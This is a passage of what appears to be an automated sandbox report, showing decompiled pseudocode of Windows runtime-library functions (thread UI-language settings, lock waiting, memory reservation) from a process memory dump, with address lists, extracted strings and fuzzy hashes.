									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01106D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E011076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01198938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E010FB150();
													}
													_t116 = E01196D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E011075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x11e8638; // 0x0
																	_t122 = L011038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E011076E2(_t154);
																			goto L41;
																		}
																	} else {
																		E011076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0112FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L011070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0112FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0112FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0112FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0112FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0112FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x11e7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x11e7b84 = _t75;
						_t73 = E0110EB70(_t134, 0x11e7b60);
						if( *0x11e7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0110FF60( *0x11e7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0112fab0
0x0112fab2
0x0112fab3
0x0112fab4
0x0112fabc
0x0112fac0
0x0112fb14
0x0112fb17
0x0112fac2
0x0112fac8
0x0112facd
0x0112fad3
0x0112fad3
0x0112fadd
0x0112fb18
0x0112fb1b
0x0112fb1d
0x0112fb1e
0x0112fb1f
0x0112fb20
0x0112fb21
0x0112fb22
0x0112fb23
0x0112fb24
0x0112fb25
0x0112fb26
0x0112fb27
0x0112fb28
0x0112fb29
0x0112fb2a
0x0112fb2b
0x0112fb2c
0x0112fb2d
0x0112fb2e
0x0112fb2f
0x0112fb3a
0x0112fb3b
0x0112fb3e
0x0112fb41
0x0112fb44
0x0112fb47
0x0112fb4a
0x0112fb4d
0x0112fb53
0x0116bdcb
0x0116bdcb
0x0112fb59
0x0112fb5b
0x0112fb5b
0x0112fb5e
0x0116bdd5
0x0116bdd8
0x00000000
0x0116bdda
0x00000000
0x0116bdda
0x0112fb64
0x0112fb64
0x0112fb64
0x0112fb67
0x0112fb6e
0x0112fb70
0x0112fb72
0x00000000
0x0112fb78
0x0112fb7a
0x0112fb7a
0x0112fb7d
0x0112fb80
0x0116bddf
0x0116bde1
0x00000000
0x0116bde3
0x00000000
0x0116bde3
0x0112fb86
0x0112fb86
0x0112fb86
0x0112fb8b
0x0112fb90
0x0112fb92
0x0112fb94
0x0112fb9a
0x0112fb9b
0x0112fba1
0x0116bde8
0x0116bdeb
0x0116bded
0x0116beb5
0x0116beb5
0x0116bebb
0x0116bebd
0x0116bec3
0x0116bed2
0x0116bedd
0x0116bedd
0x0116beed
0x00000000
0x0116bdf3
0x0116bdfe
0x0116be06
0x0116be0b
0x0116be0d
0x0116be0f
0x0116be14
0x0116be19
0x0116be20
0x0116be25
0x0116be27
0x0116be35
0x0116be39
0x0116be46
0x0116be4f
0x0116be54
0x0116be56
0x0116bef8
0x0116bef8
0x00000000
0x0116be5c
0x0116be5c
0x0116be60
0x00000000
0x0116be66
0x0116be66
0x0116be7f
0x0116be84
0x0116be87
0x0116be89
0x0116be8b
0x0116be99
0x0116be9d
0x0116bea0
0x0116beac
0x0116beaf
0x0116beb1
0x0116beb3
0x0116beb3
0x00000000
0x0116bea2
0x0116bea2
0x00000000
0x0116bea2
0x0116be8d
0x0116be8d
0x0116be92
0x00000000
0x0116be92
0x0116be8b
0x0116be60
0x0116be3b
0x0116be3b
0x0116be3e
0x00000000
0x0116be40
0x0116be40
0x0116be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0116be44
0x0116be3e
0x0116be29
0x0116be29
0x00000000
0x0116be29
0x0116be27
0x00000000
0x0112fba7
0x0112fba7
0x0112fbab
0x0116bf02
0x0112fbb1
0x0112fbb1
0x0112fbb8
0x0112fbbd
0x0112fbbd
0x0112fbbf
0x0112fbbf
0x0112fbc5
0x0112fbcb
0x0112fbf8
0x0112fbf8
0x0112fbfa
0x00000000
0x0112fc00
0x0112fc00
0x0112fc03
0x00000000
0x0112fc09
0x0112fc09
0x0112fc0f
0x0112fc15
0x0112fc23
0x0112fc23
0x0112fc25
0x0112fc27
0x0112fc75
0x0112fc7c
0x0112fc84
0x00000000
0x0112fc29
0x0112fc29
0x0112fc2d
0x0112fc30
0x0116bf0f
0x00000000
0x0112fc36
0x0112fc38
0x0112fc3b
0x0112fc41
0x0116bf17
0x0116bf19
0x0116bf48
0x0116bf4b
0x00000000
0x0116bf1b
0x0116bf22
0x0116bf24
0x0116bf26
0x00000000
0x0116bf2c
0x0116bf37
0x0116bf39
0x0116bf3b
0x00000000
0x0116bf41
0x0116bf41
0x0116bf41
0x0116bf41
0x0116bf45
0x00000000
0x0116bf45
0x0116bf3b
0x0116bf26
0x00000000
0x0112fc47
0x0112fc47
0x0112fc49
0x0112fcb2
0x0112fcb4
0x0112fcb6
0x0112fcdc
0x0112fcdc
0x00000000
0x0112fcb8
0x0112fcc3
0x0112fcc5
0x0112fcc7
0x00000000
0x0112fcc9
0x0112fcc9
0x0112fccd
0x00000000
0x0112fccd
0x0112fcc7
0x00000000
0x0112fc4b
0x0112fc4b
0x0112fc4e
0x0112fc4e
0x0112fc51
0x0112fc51
0x0112fc54
0x0112fc5a
0x0112fc5c
0x0112fc5f
0x0112fc61
0x0112fc63
0x0112fc65
0x0112fc67
0x0112fc6e
0x0112fc72
0x0112fc72
0x0112fc72
0x0112fc72
0x0112fc67
0x0112fc61
0x00000000
0x0112fc5a
0x0112fc49
0x0112fc41
0x0112fc30
0x0112fc27
0x0112fc03
0x0112fbcd
0x0112fbd3
0x0112fbd9
0x0112fbdc
0x0112fbde
0x0112fc99
0x0112fc9b
0x0112fc9d
0x0112fcd5
0x0112fcd5
0x0112fc89
0x0112fc89
0x00000000
0x0112fc9f
0x0112fc9f
0x0112fca3
0x00000000
0x0112fca3
0x00000000
0x0112fbe4
0x0112fbe4
0x0112fbe4
0x0112fbe4
0x0112fbe9
0x0112fbf2
0x00000000
0x0112fbf2
0x0112fbde
0x0112fbcb
0x0112fbab
0x0112fc8b
0x0112fc8b
0x0112fc8c
0x0112fb80
0x0112fb72
0x0112fb5e
0x0112fc8d
0x0112fc91
0x0112fadf
0x0112fadf
0x0112fae1
0x0112fae4
0x0112fae7
0x0112faec
0x0112faf8
0x0112fb00
0x0112fb07
0x0112fb0f
0x0112fb0f
0x0112fb07
0x00000000
0x0112faf8
0x0112fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0116BE0F

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4ec9b67f1a88876f3bf55da41c1dd95dee1b1ebfcacbf4a1d10f12271e434310
Instruction ID: 642253e484f5456b0c0f29318fd16b82f43824653b6d6ca767d5ed98b86c8f80
Opcode Fuzzy Hash: 4ec9b67f1a88876f3bf55da41c1dd95dee1b1ebfcacbf4a1d10f12271e434310
Instruction Fuzzy Hash: D5A10531B006278BEB2ECF68C850B7EB7B9AF44724F044569D946DB681DB31D862CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010F2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E010F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x11e5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x11e7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011397C0();
				}
				if( *0x11e79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11e79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01121624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01117D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0118FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01139520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0112E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0114DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x11e6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x11e6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01139980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01117D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01117D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01177016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0118FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x11e5350;
							if(_t109 != 0x11e5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0118FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01185720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x010f2d8a
0x010f2d8a
0x010f2d92
0x010f2d96
0x010f2d9e
0x010f2da0
0x010f2da3
0x010f2da5
0x010f2da8
0x010f2dab
0x010f2db2
0x0114f9aa
0x0114f9ab
0x0114f9ae
0x0114f9ae
0x010f2db8
0x010f2dc2
0x0114f9b9
0x0114f9be
0x0114f9bf
0x0114f9bf
0x010f2dcf
0x0114f9c9
0x010f2dd5
0x010f2dd5
0x010f2dd5
0x010f2dde
0x010f2de1
0x010f2e70
0x010f2e72
0x010f2e72
0x010f2de7
0x010f2deb
0x010f2e7c
0x010f2e83
0x010f2e85
0x010f2e8b
0x010f2e8d
0x010f2e92
0x010f2e92
0x010f2e85
0x010f2df1
0x010f2df7
0x010f2df9
0x010f2df9
0x010f2dfc
0x010f2dff
0x010f2e02
0x00000000
0x010f2e05
0x010f2e0c
0x0114f9d9
0x010f2e12
0x010f2e12
0x010f2e12
0x010f2e1a
0x0114f9e3
0x0114f9e9
0x0114f9f0
0x0114f9f6
0x0114f9f8
0x0114f9f8
0x0114f9f0
0x010f2e23
0x0114fa02
0x0114fa03
0x0114fa05
0x0114fa06
0x00000000
0x010f2e29
0x010f2e29
0x010f2e2e
0x010f2e34
0x010f2e3e
0x00000000
0x00000000
0x010f2e44
0x010f2e47
0x010f2e4d
0x00000000
0x00000000
0x010f2e4f
0x010f2e54
0x00000000
0x00000000
0x010f2e5a
0x010f2e5f
0x010f2e9a
0x010f2ea4
0x010f2ea5
0x010f2ea8
0x010f2eaf
0x010f2eb2
0x010f2eb5
0x0114fae9
0x0114faeb
0x0114faed
0x0114faef
0x0114faf7
0x0114faf8
0x0114fafd
0x0114faff
0x0114fb04
0x0114fb04
0x0114faff
0x010f2ec0
0x010f2ec4
0x010f2ec6
0x010f2ec8
0x0114fb14
0x0114fb18
0x0114fb1e
0x0114fb21
0x0114fb21
0x010f2ece
0x010f2ece
0x010f2ece
0x010f2ed7
0x010f2e61
0x010f2e63
0x0114fa6b
0x0114fa71
0x0114fa76
0x0114fa78
0x0114fa8a
0x0114fa7a
0x0114fa83
0x0114fa83
0x0114fa8f
0x0114fa91
0x0114fa97
0x0114fa9d
0x0114faa4
0x0114faaa
0x0114faaf
0x0114fab1
0x0114fac3
0x0114fab3
0x0114fabc
0x0114fabc
0x0114fac8
0x0114facb
0x0114fadf
0x0114fadf
0x0114facb
0x0114faa4
0x0114fa91
0x010f2e6f
0x010f2e6f
0x010f2e5f
0x0114fa13
0x0114fa15
0x0114fa17
0x0114fa1f
0x0114fa21
0x0114fa22
0x0114fa25
0x0114fa28
0x0114fa2f
0x0114fa2f
0x0114fa2a
0x0114fa2a
0x0114fa2a
0x0114fa31
0x0114fa34
0x0114fa36
0x0114fa3c
0x0114fa3e
0x0114fa41
0x0114fa43
0x0114fa45
0x0114fa45
0x0114fa41
0x0114fa3c
0x0114fa4a
0x0114fa4f
0x0114fa51
0x0114fa53
0x0114fa56
0x0114fa5b
0x0114fa5e
0x00000000
0x0114fa5e
0x010f2e23

Strings

RTL: Re-Waiting, xrefs: 0114FA4A

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: d40002a47583722d49b31a6e51ebab04edcd5952f2387953822fc4062c604a2c
Instruction ID: 0359315b6b24a094943a4fd52f3abb249a52b48fa26ce41e93736a82edcd2e37
Opcode Fuzzy Hash: d40002a47583722d49b31a6e51ebab04edcd5952f2387953822fc4062c604a2c
Instruction Fuzzy Hash: 17615731A006469FEB3ADF6CC841B7E7BE5EB40B18F2442A9E691977C1D730D942C782

Uniqueness

Uniqueness Score: -1.00%

Function 011C0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E011C0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E011BFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E011C1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01139730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E011BA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E011BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x11e8b04 >> 0x14) + (_v44 -  *0x11e8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01117D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E011B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01117D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E011AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x11e8724 & 0x00000008) != 0) {
						E011B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011C15B5(0x11e8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x011c0eb7
0x011c0eb9
0x011c0ec0
0x011c0ec2
0x011c0ecd
0x011c105b
0x011c105b
0x011c1061
0x011c1066
0x011c1066
0x011c106b
0x011c1073
0x011c1073
0x011c0ed3
0x011c0ed6
0x011c0edc
0x011c0ee0
0x011c0ee7
0x011c0ef0
0x011c0ef5
0x011c0efa
0x011c0efc
0x011c0efd
0x011c0f03
0x011c0f04
0x011c0f06
0x011c0f07
0x011c0f09
0x011c0f0e
0x011c0f14
0x011c0f23
0x011c0f2d
0x011c0f34
0x011c0f34
0x011c0f14
0x011c0f52
0x00000000
0x00000000
0x011c0f58
0x011c0f73
0x011c0f74
0x011c0f79
0x011c0f7d
0x011c0f80
0x011c0f86
0x011c0fab
0x011c0fb5
0x011c0fc6
0x011c0fd1
0x011c0fe3
0x011c0fd3
0x011c0fdc
0x011c0fdc
0x011c0feb
0x011c1009
0x011c1009
0x011c1015
0x011c1027
0x011c1017
0x011c1020
0x011c1020
0x011c102f
0x011c103c
0x011c103c
0x011c1048
0x011c1050
0x011c1050
0x011c1055
0x00000000
0x011c1055
0x011c0f88
0x011c0f9e
0x011c0fa2
0x011c0fa9
0x00000000
0x00000000
0x00000000
0x011c0fa9
0x00000000

Strings

`, xrefs: 011C0F16

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 2064188d1081ee9532e8d3388fcc3e1963d9ea4ae9ec0295727d2010978feeb7
Instruction ID: b100980fef8c7ad80fe8baa1c2b59fca8645bffa12278753122ced55984b5af6
Opcode Fuzzy Hash: 2064188d1081ee9532e8d3388fcc3e1963d9ea4ae9ec0295727d2010978feeb7
Instruction Fuzzy Hash: B3519D71304342DBD329DF28D980B5BBBE5EBD8B04F04092CFA9697291D770E845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0112F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0112F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01114120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01139830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01139990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011395D0();
							goto L11;
						} else {
							_t109 = L01114620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0113F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
